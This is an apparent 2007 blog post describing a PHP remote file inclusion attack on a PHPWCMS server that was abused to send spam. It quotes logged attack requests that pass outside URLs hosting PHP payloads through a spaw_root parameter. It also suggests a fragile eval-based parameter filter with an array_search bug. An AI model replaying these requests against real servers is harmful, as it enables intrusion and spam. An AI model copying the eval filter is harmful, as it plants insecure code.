Cesar D. Rodas

Hello to every one!, after almost a month of inactivity I decide to write about this, my idea with this article is show how to fix a big problem and not talk bad about and open project.

Before beginning, PHPWCMS + other bad php configurations is a really back door. I think PHPWCMS is not a back door and I want to think that if there is a bug in that project that was only an human error, that was not intentional.

I may be writing about a bug that is already fixed or not, I do not have to be googling to find out that.

A web server from some place where I work was beginning attacked by some “hackers” or “spammers” that used the server for send emails. You may think that send some emails is not so bad, but imagine send 6MBPS (48Mbps) of emails.. too much not?

And watching the httpd access log I saw something interesting, there

include($spaw_root.”/some/path”);

That combination with a Register_Global=On is fatal. But I don’t know why… because that is not an error at all I think PHPWCMS do something similar to if ( !isset($spaw_root) ) $spaw_root=”default”;

That mean they (the hackers) call the URL with a spaw_root GET parameter with an URL, so if they query to our server script_with_bug.php?spaw_root=http://www.php.net/index.php the URL is download by PHP and parsed as an PHP code, so they can print something in plain text and that code will be executed in our server.

You may ask that the “/some/path” will avoid to stop that kind of attack, I am afraid not, you can do a simple test.

• Open http://www.php.net/index.php
• Open http://www.php.net/index.php/some/path

The result is the same thing, because the index.php is an script, not an directory in example two, so it is executed till index.php

Watching the access log, I saw that the “hackers” did something like this “GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=$URL” where $URL is “http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/tester.txt?“. With this page the PHP was download the page http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/tester.txt as Text file and process it as a PHP script.

Watching out the logs I saw pages like “http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/exp667.txt?”,”http://hackangels.by.ru/good.txt?”, “http://trojanboy.by.ru/trojanboy.txt? ” and severals others. Most of pages are for send emails using the web-server bandwidth. That is a big troube, because our bandwidth is used, and our server will be marked as spamer…

To avoid that kind of attack they are several ways, like fix that code (this is the more expensive), translate the page to another CMS (very expensive too), or tune PHP configuration for avoid attacks.

What I’ve done to avoid was open the /etc/php.ini file and set the “allow_url_fopen = On” to Off. That will deny to include remote files, I think that configure must by Off by default.

Another good idea is to set the “Register_Global = Off” and if the project needs the register global be ON, we can do a simple function to avoid that.

<?php
$allow_params=array(”foo”,”foobar”,”bar”); //allow params
foreach($_GET as $k => $v) {
if ( array_search($k, $allow_params) )
eval(’$’.$k.’= $v;’);
}
//the same could be done for $_POST
?>

I hope this mini article could help to avoid attacks through PHP back doors and help to write better software (free or not) every day.

Fell free to post a comment for ask something or for do a contribution

Share and Enjoy: These icons link to social bookmarking sites where readers can share and discover new web pages.

This entry was posted on Wednesday, August 29th, 2007 at 1:15 pm and is filed under PHP, servers. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.